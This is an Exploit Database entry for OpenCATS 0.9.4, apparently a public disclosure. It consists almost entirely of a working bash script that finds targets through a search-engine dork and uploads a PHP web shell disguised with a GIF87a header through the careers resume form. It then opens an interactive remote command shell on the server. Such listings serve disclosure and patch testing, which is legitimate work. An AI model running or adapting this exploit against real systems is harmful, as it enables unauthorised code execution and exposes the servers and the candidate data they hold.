OpenCATS 0.9.4 - Remote Code Execution (RCE)

EDB-ID:

50585

CVE:

N/A




Platform:

PHP

Date:

2021-12-10


# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server

#!/bin/bash

if [ $# -eq 0 ]
then
	echo "Usage: $0 <target URL>"
	exit
fi



# if a payload doesn't work, try another

payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'

target=$1

green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"

#====================== Functions

rev() {
while true
	do echo -n -e "\n$ "
	read cmd
	curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
	done
}

upload() {
	curl -skL $1/$2 \
	-H "Connection: close" \
	-F resumeFile=@"$3;type=application/x-php" \
	-F ID="$firstJb" \
	-F candidateID="-1" \
	-F applyToJobSubAction="resumeLoad" \
	--compressed \
	--insecure
}

getVersion() {
	ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`

	if [ -z "${ver}" ]
	then
		ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
		if [ -z "${ver}" ]
		then
			echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
			return 0
		fi
	fi
	echo -e "${green}[*] Version detected: $ver${reset}"
}

writePayload(){

	tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
	file=`basename $tmpfile`
	echo "$1" > $tmpfile
}

banner(){
	echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
	echo -e "\n"
}

#======================

banner

echo "[*] Attacking target $target"

echo "[*] Checking CATS version..."
getVersion $target
#exit

echo "[*] Creating temp file with payload..."
writePayload "$payload"

#exit

echo "[*] Checking active jobs..."

jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`

if [[ ! $numJb -gt 0 ]]
then
	echo -e "${red}[-] No active jobs found.${reset}"
	echo "[*] Trying another path..."
	jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
	numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`

	if [[ ! $numJb -gt 0 ]]
	then
		echo -e "${red}[-] Couldn't find any active job.${reset}"
		exit
	fi
fi

firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`

echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
echo "[*] Sending payload..."

req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`

if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
	echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
	echo "[*] Checking by another method..."

	sed -i "s/GIF87a//" $tmpfile

	req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`

	if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
	then
		echo -e "${red}[-] Couldn't upload payload...${reset}"
		exit
	fi
fi

echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
rm $tmpfile
echo "[*] Checking shell..."
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if `echo $check | grep -q "0x7359"`
then
	echo -e "${green}[+] Got shell! :D${reset}"
	curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
	rev $target/upload/careerportaladd/$file
else
	echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi